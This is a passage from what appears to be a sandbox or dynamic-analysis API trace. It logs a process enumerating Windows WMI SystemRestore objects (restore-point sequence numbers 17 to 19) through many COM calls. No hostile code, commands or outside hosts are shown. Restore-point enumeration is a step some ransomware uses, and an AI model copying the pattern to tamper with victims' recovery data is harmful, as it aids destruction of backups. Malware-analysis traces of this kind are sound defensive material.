pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.669] WbemDefPath:IUnknown:Release (This=0x77c358) returned 0x3 [0116.669] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.669] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.669] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738150, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.670] WbemDefPath:IUnknown:Release (This=0x6738150) returned 0x2 [0116.670] WbemDefPath:IUnknown:Release (This=0x6738150) returned 0x1 [0116.670] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.670] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.670] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738150, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6738150) returned 0x0 [0116.670] WbemDefPath:IUnknown:AddRef (This=0x6738150) returned 0x3 [0116.670] WbemDefPath:IUnknown:Release (This=0x6738150) returned 0x2 [0116.670] WbemDefPath:IWbemPath:SetText (This=0x6738150, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=17") returned 0x0 [0116.670] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.670] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.670] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.670] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.670] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.670] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.670] IWbemClassObject:Get (in: This=0x673b2d0, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352df50*=0, plFlavor=0x352df54*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x11, varVal2=0x0), pType=0x352df50*=19, plFlavor=0x352df54*=0) returned 0x0 [0116.670] IWbemClassObject:Get (in: This=0x673b2d0, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352df50*=19, plFlavor=0x352df54*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x11, varVal2=0x0), pType=0x352df50*=19, plFlavor=0x352df54*=0) returned 0x0 [0116.670] CoTaskMemAlloc (cb=0x4) returned 0x77c398 [0116.670] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77c398, puReturned=0x3526b58 | out: apObjects=0x77c398*=0x673b468, puReturned=0x3526b58*=0x1) returned 0x0 [0116.671] IUnknown:QueryInterface (in: This=0x673b468, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x673b468) returned 0x0 [0116.671] IUnknown:QueryInterface (in: This=0x673b468, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.671] IUnknown:QueryInterface (in: This=0x673b468, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.671] IUnknown:AddRef (This=0x673b468) returned 0x3 [0116.671] IUnknown:QueryInterface (in: This=0x673b468, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.671] IUnknown:QueryInterface (in: This=0x673b468, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.671] IUnknown:QueryInterface (in: This=0x673b468, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x673b46c) returned 0x0 [0116.671] IMarshal:GetUnmarshalClass (in: This=0x673b46c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.671] IUnknown:Release (This=0x673b46c) returned 0x3 [0116.671] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.671] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.671] IUnknown:QueryInterface (in: This=0x673b468, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.671] IUnknown:Release (This=0x673b468) returned 0x2 [0116.672] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.672] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.672] IUnknown:QueryInterface (in: This=0x673b468, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x673b468) returned 0x0 [0116.672] IUnknown:AddRef (This=0x673b468) returned 0x4 [0116.672] IUnknown:Release (This=0x673b468) returned 0x3 [0116.672] IUnknown:Release (This=0x673b468) returned 0x2 [0116.672] CoTaskMemFree (pv=0x77c398) [0116.672] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.672] IUnknown:AddRef (This=0x673b468) returned 0x3 [0116.672] IWbemClassObject:Get (in: This=0x673b468, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.672] IWbemClassObject:Get (in: This=0x673b468, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=18", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.672] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=18") returned 0x70 [0116.672] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=18") returned 0x70 [0116.672] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.672] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.673] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.673] IUnknown:Release (This=0x72015c) returned 0x1 [0116.673] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736e58) returned 0x0 [0116.673] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e58, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.673] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e58, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x67381c0) returned 0x0 [0116.674] WbemDefPath:IUnknown:Release (This=0x6736e58) returned 0x0 [0116.674] WbemDefPath:IUnknown:QueryInterface (in: This=0x67381c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x67381c0) returned 0x0 [0116.674] WbemDefPath:IUnknown:QueryInterface (in: This=0x67381c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.674] WbemDefPath:IUnknown:AddRef (This=0x67381c0) returned 0x3 [0116.674] WbemDefPath:IUnknown:QueryInterface (in: This=0x67381c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.674] WbemDefPath:IUnknown:QueryInterface (in: This=0x67381c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.674] WbemDefPath:IUnknown:QueryInterface (in: This=0x67381c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77c398) returned 0x0 [0116.674] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c398, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.674] WbemDefPath:IUnknown:Release (This=0x77c398) returned 0x3 [0116.674] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.674] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.674] WbemDefPath:IUnknown:QueryInterface (in: This=0x67381c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.674] WbemDefPath:IUnknown:Release (This=0x67381c0) returned 0x2 [0116.674] WbemDefPath:IUnknown:Release (This=0x67381c0) returned 0x1 [0116.675] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.675] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x67381c0, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x67381c0) returned 0x0 [0116.675] WbemDefPath:IUnknown:AddRef (This=0x67381c0) returned 0x3 [0116.675] WbemDefPath:IUnknown:Release (This=0x67381c0) returned 0x2 [0116.675] WbemDefPath:IWbemPath:SetText (This=0x67381c0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=18") returned 0x0 [0116.675] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.675] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.675] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.675] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.675] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.675] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.676] IWbemClassObject:Get (in: This=0x673b468, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352e7a0*=0, plFlavor=0x352e7a4*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12, varVal2=0x0), pType=0x352e7a0*=19, plFlavor=0x352e7a4*=0) returned 0x0 [0116.676] IWbemClassObject:Get (in: This=0x673b468, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352e7a0*=19, plFlavor=0x352e7a4*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12, varVal2=0x0), pType=0x352e7a0*=19, plFlavor=0x352e7a4*=0) returned 0x0 [0116.676] CoTaskMemAlloc (cb=0x4) returned 0x77c3d8 [0116.676] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77c3d8, puReturned=0x3526b58 | out: apObjects=0x77c3d8*=0x673b600, puReturned=0x3526b58*=0x1) returned 0x0 [0116.708] IUnknown:QueryInterface (in: This=0x673b600, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x673b600) returned 0x0 [0116.708] IUnknown:QueryInterface (in: This=0x673b600, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.708] IUnknown:QueryInterface (in: This=0x673b600, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.708] IUnknown:AddRef (This=0x673b600) returned 0x3 [0116.708] IUnknown:QueryInterface (in: This=0x673b600, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.708] IUnknown:QueryInterface (in: This=0x673b600, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.708] IUnknown:QueryInterface (in: This=0x673b600, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x673b604) returned 0x0 [0116.709] IMarshal:GetUnmarshalClass (in: This=0x673b604, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.709] IUnknown:Release (This=0x673b604) returned 0x3 [0116.709] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.709] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.709] IUnknown:QueryInterface (in: This=0x673b600, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.709] IUnknown:Release (This=0x673b600) returned 0x2 [0116.709] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.709] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.709] IUnknown:QueryInterface (in: This=0x673b600, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x673b600) returned 0x0 [0116.709] IUnknown:AddRef (This=0x673b600) returned 0x4 [0116.709] IUnknown:Release (This=0x673b600) returned 0x3 [0116.709] IUnknown:Release (This=0x673b600) returned 0x2 [0116.709] CoTaskMemFree (pv=0x77c3d8) [0116.709] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.709] IUnknown:AddRef (This=0x673b600) returned 0x3 [0116.709] IWbemClassObject:Get (in: This=0x673b600, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.709] IWbemClassObject:Get (in: This=0x673b600, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=19", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.710] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=19") returned 0x70 [0116.710] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=19") returned 0x70 [0116.710] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.710] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.710] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.710] IUnknown:Release (This=0x72015c) returned 0x1 [0116.711] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736e68) returned 0x0 [0116.711] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.711] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e68, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6738230) returned 0x0 [0116.711] WbemDefPath:IUnknown:Release (This=0x6736e68) returned 0x0 [0116.711] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738230, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6738230) returned 0x0 [0116.711] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738230, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.711] WbemDefPath:IUnknown:AddRef (This=0x6738230) returned 0x3 [0116.711] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738230, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.711] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738230, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.711] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738230, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 